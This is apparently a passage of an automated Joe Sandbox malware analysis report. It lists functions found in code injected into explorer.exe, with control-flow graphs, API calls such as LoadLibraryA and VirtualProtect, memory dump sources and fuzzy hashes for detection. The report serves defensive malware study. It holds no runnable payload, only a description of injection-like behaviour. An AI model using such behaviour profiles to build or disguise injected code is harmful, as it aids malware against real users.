                                                                                                        • Snapshot File: hcaresult_20_2_ee1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: SectionUnmapView
                                                                                                        • String ID:
                                                                                                        • API String ID: 498011366-0
                                                                                                        • Opcode ID: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
                                                                                                        • Instruction ID: e452f951a80f6bffc5b01649d55be9c63636b680c455bfb6591a7b95bb7f89a1
                                                                                                        • Opcode Fuzzy Hash: dbf61e07686744f72196ae4154379358cd8380f5b457a8fa64264e9f57adb311
                                                                                                        • Instruction Fuzzy Hash: F211C87461194D4FFB5CFB79989D37633E2F714312F54506EE815C76A2EE398A818700
                                                                                                        Function 00EEB4A8 Relevance: 4.8, APIs: 3, Instructions: 252memorylibraryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 0 eeb4a8-eeb4ab 1 eeb4b5-eeb4b9 0->1 2 eeb4bb-eeb4c3 1->2 3 eeb4c5 1->3 2->3 4 eeb4ad-eeb4b3 3->4 5 eeb4c7 3->5 4->1 6 eeb4ca-eeb4d1 5->6 8 eeb4dd 6->8 9 eeb4d3-eeb4db 6->9 8->6 10 eeb4df-eeb4e2 8->10 9->8 11 eeb4f7-eeb504 10->11 12 eeb4e4-eeb4f2 10->12 24 eeb51e-eeb52c call eeb46a 11->24 25 eeb506-eeb508 11->25 13 eeb52e-eeb549 12->13 14 eeb4f4-eeb4f5 12->14 15 eeb57a-eeb57d 13->15 14->11 17 eeb57f-eeb580 15->17 18 eeb582-eeb589 15->18 21 eeb561-eeb565 17->21 19 eeb58f-eeb593 18->19 22 eeb595-eeb5ae LoadLibraryA 19->22 23 eeb5f0-eeb5f9 19->23 26 eeb54b-eeb54e 21->26 27 eeb567-eeb56a 21->27 29 eeb5af-eeb5b6 22->29 33 eeb5fc-eeb605 23->33 24->1 31 eeb50b-eeb512 25->31 26->18 30 eeb550 26->30 27->18 32 eeb56c-eeb570 27->32 29->19 35 eeb5b8 29->35 36 eeb551-eeb555 30->36 50 eeb51c 31->50 51 eeb514-eeb51a 31->51 32->36 37 eeb572-eeb579 32->37 38 eeb62a-eeb67a VirtualProtect * 2 33->38 39 eeb607-eeb609 33->39 41 eeb5ba-eeb5c2 35->41 42 eeb5c4-eeb5cc 35->42 36->21 43 eeb557-eeb559 36->43 37->15 40 eeb67e-eeb683 38->40 45 eeb61c-eeb628 39->45 46 eeb60b-eeb61a 39->46 40->40 47 eeb685-eeb694 40->47 48 eeb5ce-eeb5da 41->48 42->48 43->21 49 eeb55b-eeb55f 43->49 45->46 46->33 54 eeb5dc-eeb5e3 48->54 55 eeb5e5-eeb5ef 48->55 49->21 49->27 50->24 50->31 51->50 54->29
                                                                                                        APIs
                                                                                                        • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,?,7473604B), ref: 00EEB5A7
                                                                                                        • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 00EEB651
                                                                                                        • VirtualProtect.KERNELBASE ref: 00EEB66F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000014.00000002.4174152479.0000000000EEA000.00000040.80000000.00040000.00000000.sdmp, Offset: 00EEA000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_20_2_eea000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ProtectVirtual$LibraryLoad
                                                                                                        • String ID:
                                                                                                        • API String ID: 895956442-0
                                                                                                        • Opcode ID: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                                                                                                        • Instruction ID: 86c99aab491f440027c59fe3d355ae4e9293ade6ddbad9fc060975c4e1cc7dc6
                                                                                                        • Opcode Fuzzy Hash: 2ac08652e5940d8da138c1cef1dd6534290a638b515b67647dbd8ecab25afafd
                                                                                                        • Instruction Fuzzy Hash: 0551BE31754D9E4BCB24AB7EACC43F6B3D2F755329B18163AC49AD3285E758C84A8381
                                                                                                        Function 00EE34C4 Relevance: 3.2, APIs: 2, Instructions: 195COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                          • Part of subcall function 00EE1BF8: OpenFileMappingA.KERNEL32 ref: 00EE1C0F
                                                                                                          • Part of subcall function 00EE1BF8: MapViewOfFile.KERNELBASE ref: 00EE1C2E
                                                                                                        • SysFreeMap.PGOCR ref: 00EE36F7
                                                                                                        • SleepEx.KERNELBASE ref: 00EE3701
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000014.00000002.4174152479.0000000000EE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00EE1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_20_2_ee1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$FreeMappingOpenSleepView
                                                                                                        • String ID:
                                                                                                        • API String ID: 4205437007-0
                                                                                                        • Opcode ID: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
                                                                                                        • Instruction ID: a02cdc3d938bcd78c0fb42f8d3a3bd2191709098181c5fdba47b2e109c6c0c8a
                                                                                                        • Opcode Fuzzy Hash: b219c8272f255adf82644705b15b3be163a192963f27b66c12c2cdeb1fe9695d
                                                                                                        • Instruction Fuzzy Hash: 0551E830208A4C8FDB19FF3AD85DAAA73E2EB94304F44565DE45BD32A1DF38DA458781
                                                                                                        Function 00EE1BF8 Relevance: 3.0, APIs: 2, Instructions: 40fileCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 113 ee1bf8-ee1c18 OpenFileMappingA 114 ee1c1a-ee1c38 MapViewOfFile 113->114 115 ee1c3b-ee1c48 113->115 114->115
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000014.00000002.4174152479.0000000000EE1000.00000040.80000000.00040000.00000000.sdmp, Offset: 00EE1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_20_2_ee1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: File$MappingOpenView
                                                                                                        • String ID:
                                                                                                        • API String ID: 3439327939-0
                                                                                                        • Opcode ID: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
                                                                                                        • Instruction ID: 4a826d61f1edf7c39cf938ad3364991c881e2c36379243ae24a5e22095ffd73e
                                                                                                        • Opcode Fuzzy Hash: 6967ddb8a23556e9d4b9c667e167efa50793072ee7ce98a3c93afcac9569559f
                                                                                                        • Instruction Fuzzy Hash: 97F08234314F4D4FAB48EF7C9C9C135B7E0EBA8202700857A984AC6164EF34C8808701